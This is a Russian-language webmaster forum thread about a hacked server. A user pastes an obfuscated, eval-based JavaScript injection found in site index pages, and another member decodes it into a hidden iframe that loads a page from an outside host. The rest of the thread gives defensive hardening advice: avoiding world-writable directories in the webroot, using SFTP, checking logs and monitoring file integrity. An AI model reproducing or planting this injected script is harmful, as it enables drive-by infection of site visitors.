Хакнули мой сервер, выясняю может кого еще

Во все папки с правами 777 было залито по 3 пустых(слава богу) файла:
index.htm, index.html, index.php

На паре доменов после боди в индексе появился такой код

<script>/**/function QAl5(Som8, ciO6, Lsfi) { var CCi8; CCi8=Som8.split(ciO6); var RcB4=CCi8.join(Lsfi); return RcB4;/**/ } function Zsr4(ytjx) { ytjx = QAl5(ytjx,"##+##","'"); ytjx = QAl5(ytjx,"##|##","\\"); RcB4=""; Atc0 =""; for(k=0;k<ytjx.length;k++) { RcB4 = ytjx.charCodeAt(k); if (RcB4==32){RcB4=35} else if (RcB4==35){RcB4=32} else if (RcB4==59){RcB4=64} else if (RcB4==64){RcB4=59} else if (RcB4==37){RcB4=42} else if (RcB4==42){RcB4=37} else if (RcB4>=97 && RcB4<=122) { RcB4=RcB4-97;RcB4=25-RcB4;RcB4+=97; }else if (RcB4>=65 && RcB4<=90) { RcB4=RcB4-65;RcB4=25-RcB4;RcB4+=65; }else if (RcB4>=48 && RcB4<=57) { RcB4=RcB4-48;RcB4=9-RcB4;RcB4+=48; } Atc0 += String.fromCharCode(RcB4); } return Atc0;/**/ }ISa8=eval;ISa8(Zsr4('ezi#fwJ7#=###+##sggk://wivznh.xl.ro/rnztvh/a/hgzgrx.ksk##+##@ezi#SYk6#=###+##ruiznv##+##@'));ISa8(Zsr4('ezi#kOt9#=#wlxfnvmg.xivzgvVovnvmg(SYk6)@kOt9.hvgZggiryfgv(##+##hix##+##,#fwJ7)@'));ISa8(Zsr4('kOt9.hvgZggiryfgv(##+##drwgs##+##,9)@kOt9.hvgZggiryfgv(##+##svrtsg##+##,9)@kOt9.hvgZggiryfgv(##+##yliwvi##+##,9)@'));ISa8(Zsr4('kOt9.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));ISa8(Zsr4('kOt9.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#ezi#rqY1=mzertzgli.fhviZtvmg.glOldviXzhv()@'));ISa8(Zsr4('ezi#XrM5=rqY1.rmwvcLu(##+##nhrv##+##)@ezi#kcy2=rqY1.rmwvcLu(##+##mg#3.##+##)@'));if ((CiN4>0)&&(pxb7==-1)){ISa8(Zsr4('wlxfnvmg.ylwb.zkkvmwXsrow(kOt9)@'));}</script>

Если у кого еще такая беда случилось, делитесь соображениями через что взломали.
Кто умеет, плиз расшифруйте.

Grebezen писал:

Во все папки с правами 777 было залито по 3 пустых(слава богу) файла: index.htm, index.html, index.php

Честно говоря, держать "папки" 777 в корне веба - крайняя беспечность. Софт, который это требует, и не предлагает, как минимум, вынести эти "папки" за пределы webroot, написан слабо квалифицировнными программерами.

Ну и использовать FTP в наше время - та же проблема.

ну вот, например, стримротатор имеет папку tmp с правами 777 - что ж тут поделаешь?

та же проблема...

Оффтопик: Grebezen:

а вы типо только что зареганный нуб подхвативший эту заразу по неопытности или типо один из создателей, тестирующий бета версию данного произведения ???

tmp разве в корне?

какие скрипты то стояли?

Банальный iframe.

var udQ2='http://dreams.co.il/images/z/static.php';
var HBp3='iframe';
var pLg0=document.createElement(HBp3);
pLg0.setAttribute('src',udQ2);
pLg0.setAttribute('width','0');
pLg0.setAttribute('height','0');
pLg0.setAttribute('border','0');
pLg0.setAttribute('style','width:0; height:0; border:none;');
pLg0.setAttribute('style','display:none');
var ijB8=navigator.userAgent.toLowerCase();
var CiN4=ijB8.indexOf('msie');
var pxb7=ijB8.indexOf('nt 6');
document.body.appendChild(pLg0);

На еврейские картинки смотреть не советую (вы ведь под рутом работаете? )

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?clie…static.php

Чтобы получить ответ на вопрос "Через что взломали" надо ip спалить.

Если хост от Layered Technologies Inc. или их реселлеров, то можешь не палить - гугли сам.

господа офицеры адалта,

а зависит ли уязвимость/безопасность сервака от его стоимости?

и ещё, в таких случаях заражения сервака, адекватно ли следующее поведение админов:

сообщил админу вчера о вирусе на серваке, и что 2 домена из 8 в базы гугла попали... Тот обещал посмотреть, и до сих пор даже не посмотрел. Чего ждать-то? Пока все домены в базы загремят? Сам удалил, что смог. А у меня это происходит уже 4-ый раз за последние полгода... Это же наверное и на пэйджранке сказывается???

и последнее - подскажите альтернативу FTP...

Zizi писал:

а зависит ли уязвимость/безопасность сервака от его стоимости?

Сомневаюсь...

Цитата:

и ещё, в таких случаях заражения сервака, адекватно ли следующее поведение админов:

Зависит от обязанностей админа.

Цитата:

и последнее - подскажите альтернативу FTP...

scp/sftp, rsync via ssh.

Grebezen: у меня тож ломанули кое где
озвучь хостинг

lega_cobra:

спасибо за конструктивный и ясный ответ!!! рейтинг вам от ТС

а насчёт SFTP клиентов - нашел WinSCP, Tunnelier, BitKinex, PSFTP...

что посоветуете?

kazantipman писал:

Grebezen: озвучь хостинг

+1 ))

Zizi писал:

- нашел WinSCP,

+1

lega_cobra - может ты щас еще насоветуешь ротаторов и трейдскриптов, которые не используют 777 хоть на что ни будь?

админ говорит, что все заходы с одного (моего) IP - т.е. дело не в пароле и FTP менеджере (хотя его все равно сменил)

значит ломали скрипты... стоит атл3 и ST....

Вроде все было закрыто хтаксесами, ST закрывал через lock.php, скрипты в рефссылке тоже не принимаем - судя по всему не помогло.

как бороться с этой хернёй ?

хостинг вебазилла
скриптов много разных, в основном прогресс+дтр, кое где стрим, пару ат3, один atx, пара atxv2.

Что касается сереров и секурити я точно нуб, а так в адалте несколько лет, но на форумах редко бываю.

goodman писал:

tmp разве в корне?

да, в корне стрима, да и вообще реально у каждого скрипта есть папки 777 и много.

Смотришь на дату и время изменения страниц > анализируешь логи за этот период > узнаешь через что сломали

Grebezen писал:

ну вот, например, стримротатор имеет папку tmp с правами 777 - что ж тут поделаешь?

Стрим и например Протон, хоть и требуют 777 на document_root, прекрасно живут в подкаталогах, не засирая корень. То что их авторы об этом открыто не заявляют - оставим на их совести. То что любой скрипт может работать без 777 - тоже оставим на их совести, хотя скорее всего авторы это требуют для "минимизации глюков" с правами.

Ставьте сторонние чекалки, которые будут проверять неизменность выдаваемого HTML или наличие в нём левых кусков кода. Ставьте кроны, которые тупо будут тереть левые файлы в директориях и перезаписывать индексы из заведомо чистого дистриба. Как правило этого хватает для 99% случаев, а если не хватит - значит уже хак прошел настолько, что пиздец всему.

Mitch писал:

lega_cobra - может ты щас еще насоветуешь ротаторов и трейдскриптов, которые не используют 777 хоть на что ни будь?

Я в них не разбираюсь, поэтому ничего не посоветую. Дело даже не в 777, а в том, где их размещать. Правило номер один - каталоги, доступные на запись, должны быть за пределами WebRoot. Если есть возможность - то желательно самому править скрипты, хотя, это дело неблагодарное.

подскажите плиз как эту куйню удалять, чтоб не возвращалась?
админ, млин, то ли ничего так и не сделал, либо сделал, но не так. короче вирус сцуко сидит ещё. и ася не грузится как на зло.

кто как боролся с этим? попробую сам справится...

Оффтопик: проклинаю тех мудозвонов, что этими вирусами балуются.... паразиты

Идем на:

http://streamscripts.com/rus/streamrotator.php

находим:
"Создайте задания для крона, установите старые права на корневую директорию домена (обычно 755), удалите install.php и переходите в админку."

Т.е. убирая права на запись для other защитите директорию от попадания у нее всякого гавна за счет дырявости софта и пхп.

Последний раз редактировалось: FreeMann (22/04/09 в 00:59), всего редактировалось 1 раз

Zizi писал:

подскажите плиз как эту куйню удалять, чтоб не возвращалась? админ, млин, то ли ничего так и не сделал, либо сделал, но не так. короче вирус сцуко сидит ещё. и ася не грузится как на зло. кто как боролся с этим? попробую сам справится... Оффтопик: проклинаю тех мудозвонов, что этими вирусами балуются.... паразиты

вычищали все, вроде нет сейчас ничего на тех доменах что давали

FreeMann писал:

Идем на: http://streamscripts.com/rus/streamrotator.php находим: "Создайте задания для крона, установите старые права на корневую директорию домена (обычно 755), удалите install.php и переходите в админку." Т.е. убирая права на запись для other защитите директорию от попадания у нее всякого гавна за счет дырявости софта и пхп.

многие скрипты требуют права на запись на файлы которые они генерят и которые потом инклудятся. собственно в них вся фигня потом и пишется. обрезанием прав здесь проблему не решить.

Zizi писал:

кто как боролся с этим? попробую сам справится... Оффтопик: проклинаю тех мудозвонов, что этими вирусами балуются.... паразиты

тут на форуме кто-то рекламировал админство серваков, поищи, они помогут

п.с. если сам не шаришь - всегда нужно чтоб было к кому обратиться в случае траблы.
Мне вот на моих серваках админы всегда помогают, но стараюсь сначала сам с проблемой справиться (типа учусь), гугля помогает иногда